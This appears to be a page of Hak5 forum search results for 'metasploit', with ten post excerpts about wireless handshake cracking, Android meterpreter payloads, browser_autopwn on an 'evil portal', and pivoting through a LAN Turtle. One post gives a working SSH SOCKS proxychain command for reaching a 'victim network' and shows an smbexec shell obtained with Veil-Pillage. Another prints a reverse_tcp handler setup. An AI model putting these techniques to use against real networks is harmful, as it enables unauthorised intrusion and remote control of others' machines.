Jump to content

Search the Community

Showing results for tags 'metasploit'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
    • Key Croc
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 10 results

  1. Host OS: Windows 10 Pineapple Nano v. 2.7.0 VirtualBox v. 6.1.6 Kali Linux v. 2020.2 **Forward: I've been doing all this on my own private router, WiFi signal, computer, etc. Nothing illegal. Just trying to learn a new skill.** So I've been able to successfully capture a 4-way handshake (Both .CAP and.PCAP) using either the Pineapple Nano or Kali Linux> Successfully cracked the password of the WiFi AP using www.GPUHASH.me> And I can log into the "client" AP. I just don't know where to go from here and feel pretty dumb. How do I actually exploit the target from here? Over the last week I've been trying to learn Metasploit in Kali, thinking that this was the next logical step in the attack process. (I've also tried Armitage, but it seems like it's outdated and doesn't support Windows 10?) I understand the workflow of Metasploit: 1. Recon the target with various nmap scans: nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -Pn 1-65535 <Target IP address> 2. Note the open port numbers/software & version numbers, etc. 3. (THIS IS WHERE I GET LOST) Search Exploit-Database.com for vulnerabilities on the open ports or services being run (See attached picture) 4. Load the Exploit> Set options> Run. I keep getting confused as to how to actually find known vulnerabilities given the data from the nmap scans. Has anyone else been in my position or am I just failing to understand something simple here? Thank you very much for any feedback guys!
  2. Hello guys, Before I start, I want to say that I looked on all the forums for a solution and tried multiple options until I started writing this. I have tried to make an exploit for Android. Everything works fine until I open the apk on my test phone where after I installed it by bypassing the security restrictions, it doesn't do anything. On msf it doesn't show that it's connected to a device. As well, regardless if I stop the exploit, kill it and remove it, the server is still up and contains the file. I need a solution since I believe that this is caused by the recent changes in metasploit and android 9.
  3. Hi Guys need help with this problem im having so im trying to hack my samsung s7 edge with a meterpreter apk and when i install and open it on my phone nothing happens it still says started reverse_TCP handler on my ip address :4444 any fixes? sincerely, Kyran
  4. How do I actually increase the dimensions of the pictures while doing webcam stream and snap? I'm currently using on my android, and while I can increase the quality to 100, my pictures come very small. It's possible to take as the size of the camera of the cellphone, or at least increase it a little bit?
  5. Hello people....... tried to get a connection vie Meterpreter to mi Pineapple nano, but all the fuck i h get is this msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.178.24 yes The listen address (an interface may be specified) LPORT 4747 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.178.24:4747 [*] Sending stage (179779 bytes) to 192.168.178.25 Who knows more?
  6. v0dka

    Payload timeout

    Hi. I met a problem recently : I have installed metasploit and it runs well in SSH. But when I tried to run it in in a payload, just like: /root/metasploit-framework/msfconsole & It will run for a while, I can find it with cmd "ps -aux | grep 'msfconsole' ". But it then disappeared! As it takes a long time for msf to startup. so I think maybe the payload has a timeout. I'm not sure what's wrong with it. Thanks in advance
  7. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after i infected a machine. And also if S. E. T is working :) Thanks in advance :)
  8. Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!
  9. Hello, Does anyone have used port scanners like nmap, or vulnerability scaners like nessus, openvas, etc. while providing internet via computer? I'm using the nano on Ubuntu 14.04 using wp6.sh. I've succesfully deauthed some clients (i'm still learning so it's not perfect) and bumped them to connect to the pineapple but when i try to use any scanner using the pineapple's ip, the results are as if i was scanning a host that's not connected. So, nmap shows "scanned X ips, 0 hosts where up", nessus and openvas finish the task with zero results and metasploit can't complete any exploits because the host is down. I know that the os gets the pineapple as another interface but i don't think that's the problem because other times i've succesfully scanned hosts while connected to three different networks (using ethernet, wifi with the integrated card and wifi with an external card). I don't know if its because of the way the wps6.sh script works, because tbh i dont know how it works, but that's the problem i'm facing right now. Anyone that can help me? if you need any other data, please ask. thanks.
  10. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"
×
×
  • Create New...